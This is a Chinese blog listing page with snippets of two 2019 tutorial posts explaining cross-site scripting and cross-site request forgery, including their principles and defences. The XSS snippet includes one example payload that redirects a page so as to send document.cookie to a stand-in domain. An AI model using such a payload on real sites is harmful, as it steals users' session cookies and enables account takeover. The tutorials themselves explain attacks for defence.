网络安全
JustinNeil
年少是你未醒的梦话,风华是燃尽的彼岸花
展开
-
跨站脚本攻击
跨站脚本攻击概念攻击原理危害防范手段 概念 跨站脚本攻击(Cross-Site Scripting, XSS),可以将代码注入到用户浏览的网页上,这种代码包括 HTML 和 JavaScript。 攻击原理 例如有一个论坛网站,攻击者可以在上面发布以下内容: <script>location.href="//domain.com/?c=" + document.cookie&l...原创 2019-08-15 17:10:32 · 442 阅读 · 0 评论 -
跨站请求伪造
跨站请求伪造概念攻击原理防范手段 概念 跨站请求伪造(Cross-site request forgery,CSRF),是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己曾经认证过的网站并执行一些操作(如发邮件,发消息,甚至财产操作如转账和购买商品)。由于浏览器曾经认证过,所以被访问的网站会认为是真正的用户操作而去执行。 XSS 利用的是用户对指定网站的信任,CSRF 利用的是网站对用...原创 2019-08-15 19:12:35 · 622 阅读 · 0 评论